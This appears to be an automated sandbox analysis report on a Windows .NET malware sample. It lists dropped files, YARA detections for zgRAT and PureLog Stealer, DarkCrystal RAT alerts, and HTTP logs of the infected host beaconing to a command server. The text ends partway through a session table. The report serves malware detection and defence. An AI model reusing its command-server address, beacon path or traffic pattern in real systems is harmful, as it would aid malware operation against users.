                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with very long lines (759), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):759
                                                        Entropy (8bit):5.903083016999134
                                                        Encrypted:false
                                                        SSDEEP:12:DjhV9y+XOzNYZNduhCSbULdMWipDt4jtSUp/DlkgBX7c108V6E3:BV9rm8Puk7+vpqZx8gBr1E3
                                                        MD5:6C98CA35DCA8610BB6244CADF78009B4
                                                        SHA1:4CB957748D579A0F629BA3504763B5711BB51403
                                                        SHA-256:E434FE179A2EB5C6A71CC609291C18EAE3C94D3E0F157B12059BC8D03A5168F5
                                                        SHA-512:C1DFEDA29A45A5638F863D8A2599491839E9A52A38B48E862FF94E16DA42D7EE12DCC7F70B37732910031E410B73F86C803F9F8126C9D5DD9CCA8DB704A3C516
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3923968
                                                        Entropy (8bit):7.839804583223067
                                                        Encrypted:false
                                                        SSDEEP:49152:zh3Lmrp7Qvsdng2u6ydyscQVnzrVGU14AyH9XsBgkpFvyA1nSiF:zhC54An5pydy/QVnv4K0HxAJzqA1SiF
                                                        MD5:832D64C5F330BE9505301104FCFC574A
                                                        SHA1:DE70A17B5E6F2186BB611E9BFACDCFE6B4FD9ED2
                                                        SHA-256:29472C5E2C502ED00E6E34E4C8EF71BE0E94A0971F548DF68689AAF23B8F1064
                                                        SHA-512:DE814A248871D7902E79E98C04DD1ADD6EA7C370EEA47BBF278CB433D0F0F7E201479DCD312A4FFB6AD94CE5C15F07FF17D4D156472B26EF2EE3C3A26BE87C4E
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\SchCache\sihost.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\SchCache\sihost.exe, Author: Joe Security
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Windows\System32\w32tm.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):151
                                                        Entropy (8bit):4.843929587867158
                                                        Encrypted:false
                                                        SSDEEP:3:VLV993J+miJWEoJ8FXyUUTXaNvo5WTAnNvj:Vx993DEUEIFuAx
                                                        MD5:21C1AC635094DEA8F215684C95D892BD
                                                        SHA1:F010D20E1DD7EAB97E2F1BAB1C38A9C8CC10B0D7
                                                        SHA-256:FC444AD30B2D80919071E4B1AE025DA7382F6ADC1EC574CED58B9A1E4655E7D2
                                                        SHA-512:89B1FA72D8FA201EB468658856C28B8139122D4C602B6168BDE4297BDB4FAFE715A12C922E0EE331B6B5787525F26AEC2D0999E0F047A1ECAD6A27BC05B10191
                                                        Malicious:false
                                                        Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 02/11/2024 14:36:09..14:36:09, error: 0x80072746.14:36:14, error: 0x80072746.
                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.839804583223067
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        File name:teh76E2k50.exe
                                                        File size:3'923'968 bytes
                                                        MD5:832d64c5f330be9505301104fcfc574a
                                                        SHA1:de70a17b5e6f2186bb611e9bfacdcfe6b4fd9ed2
                                                        SHA256:29472c5e2c502ed00e6e34e4c8ef71be0e94a0971f548df68689aaf23b8f1064
                                                        SHA512:de814a248871d7902e79e98c04dd1add6ea7c370eea47bbf278cb433d0f0f7e201479dcd312a4ffb6ad94ce5c15f07ff17d4d156472b26ef2ee3c3a26be87c4e
                                                        SSDEEP:49152:zh3Lmrp7Qvsdng2u6ydyscQVnzrVGU14AyH9XsBgkpFvyA1nSiF:zhC54An5pydy/QVnv4K0HxAJzqA1SiF
                                                        TLSH:FA06F10695554E73C2E87FB084DB046D57F0C6227663EB1B761F10D1A82A2B4BF622FB
                                                        Icon Hash:00928e8e8686b000
                                                        Entrypoint:0x7bf74e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0x3bf700         0x4b          .text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3c0000         0x370         .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0x3c2000         0xc           .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                        Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity  File Type  Entropy              Characteristics
                                                        .text   0x2000           0x3bd754      0x3bd800  ae4265524ab022783d5efd633ad9e5d1  unknown   unknown          unknown    unknown              IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc   0x3c0000         0x370         0x400     0b2e8d91fbadce7b4cf5978b57d5f2f9  False     0.3759765625     data       2.854832632722979    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .reloc  0x3c2000         0xc           0x200     9c5ce71a517dd5a925092a8ff2eb4d0f  False     0.044921875      data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        Name        RVA       Size   Type  Language  Country  ZLIB Complexity
                                                        RT_VERSION  0x3c0058  0x318  data                     0.44823232323232326
                                                        DLL          Import
                                                        mscoree.dll  _CorExeMain
                                                        Timestamp                        SID      Signature                                                               Severity  Source IP    Source Port  Dest IP       Dest Port  Protocol
                                                        2024-11-02T17:47:40.982112+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         20.12.23.50  443          192.168.2.5   49782      TCP
                                                        2024-11-02T17:47:48.403181+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)                    1         192.168.2.5  49829        194.135.20.4  80         TCP
                                                        2024-11-02T17:48:03.731878+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)                    1         192.168.2.5  49909        194.135.20.4  80         TCP
                                                        2024-11-02T17:48:18.795771+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         20.12.23.50  443          192.168.2.5   49984      TCP
                                                        2024-11-02T17:48:25.612187+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)                    1         192.168.2.5  49998        194.135.20.4  80         TCP
                                                        2024-11-02T17:48:35.409477+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)                    1         192.168.2.5  50000        194.135.20.4  80         TCP
                                                        2024-11-02T17:48:48.746972+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)                    1         192.168.2.5  50002        194.135.20.4  80         TCP
                                                        2024-11-02T17:48:58.684477+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)                    1         192.168.2.5  50004        194.135.20.4  80         TCP
                                                        2024-11-02T17:49:10.569070+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)                    1         192.168.2.5  50005        194.135.20.4  80         TCP
                                                        2024-11-02T17:49:23.997157+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)                    1         192.168.2.5  50008        194.135.20.4  80         TCP
                                                        2024-11-02T17:49:32.751139+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)                    1         192.168.2.5  50009        194.135.20.4  80         TCP
                                                        2024-11-02T17:49:45.710601+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)                    1         192.168.2.5  50011        194.135.20.4  80         TCP
                                                        Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                        Nov 2, 2024 17:48:35.546955109 CET5000080192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:47.869316101 CET5000280192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:47.874109983 CET8050002194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:47.875113964 CET5000280192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:47.882309914 CET5000280192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:47.887243032 CET8050002194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:48.231930017 CET5000280192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:48.236876965 CET8050002194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:48.706559896 CET8050002194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:48.746972084 CET5000280192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:49.007323027 CET5000280192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:57.782800913 CET5000480192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:57.787770987 CET8050004194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:57.787841082 CET5000480192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:57.788095951 CET5000480192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:57.793592930 CET8050004194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:58.138127089 CET5000480192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:58.143105030 CET8050004194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:58.612087011 CET8050004194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:58.684477091 CET5000480192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:59.058868885 CET5000480192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:09.511331081 CET5000580192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:09.516477108 CET8050005194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:09.516567945 CET5000580192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:09.516796112 CET5000580192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:09.521775961 CET8050005194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:09.874196053 CET5000580192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:09.879251957 CET8050005194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:10.363123894 CET8050005194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:10.569070101 CET5000580192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:10.759619951 CET5000580192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:23.019195080 CET5000880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:23.024152040 CET8050008194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:23.024254084 CET5000880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:23.024516106 CET5000880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:23.029514074 CET8050008194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:23.372236967 CET5000880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:23.377084970 CET8050008194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:23.885118961 CET8050008194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:23.997157097 CET5000880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:24.305278063 CET5000880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:31.852915049 CET5000980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:31.857708931 CET8050009194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:31.857809067 CET5000980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:31.858023882 CET5000980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:31.862798929 CET8050009194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:32.216011047 CET5000980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:32.220918894 CET8050009194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:32.698788881 CET8050009194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:32.751138926 CET5000980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:32.796513081 CET5000980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:44.770307064 CET5001180192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:44.775206089 CET8050011194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:44.775269032 CET5001180192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:44.775507927 CET5001180192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:44.780255079 CET8050011194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:45.122374058 CET5001180192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:45.127199888 CET8050011194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:45.629149914 CET8050011194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:45.710601091 CET5001180192.168.2.5194.135.20.4
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 2, 2024 17:47:20.892128944 CET | 1.1.1.1 | 192.168.2.5 | 0x616f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Nov 2, 2024 17:47:20.892128944 CET | 1.1.1.1 | 192.168.2.5 | 0x616f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                        • 194.135.20.4
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49829 | 194.135.20.4 | 80 | 4072 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe

Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 17:47:47.524085045 CET | 499 | OUT | POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 194.135.20.4
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Nov 2, 2024 17:47:47.872826099 CET | 344 | OUT | POST body (application/octet-stream)
Nov 2, 2024 17:47:48.351445913 CET | 516 | IN | HTTP/1.1 100 Continue
HTTP/1.1 404 Not Found
Date: Sat, 02 Nov 2024 16:47:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 274
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49909 | 194.135.20.4 | 80 | 4616 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe

Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 17:48:02.920274973 CET | 534 | OUT | POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 194.135.20.4
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Nov 2, 2024 17:48:03.278435946 CET | 344 | OUT | POST body (application/octet-stream)
Nov 2, 2024 17:48:03.731477022 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 2, 2024 17:48:03.731488943 CET | 491 | IN | HTTP/1.1 404 Not Found
Date: Sat, 02 Nov 2024 16:48:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 274
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49968 | 194.135.20.4 | 80 | 4564 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe

Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 17:48:14.993206024 CET | 552 | OUT | POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 194.135.20.4
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Nov 2, 2024 17:48:15.341116905 CET | 344 | OUT | POST body (application/octet-stream)
Nov 2, 2024 17:48:15.859442949 CET | 516 | IN | HTTP/1.1 100 Continue
HTTP/1.1 404 Not Found
Date: Sat, 02 Nov 2024 16:48:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 274
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
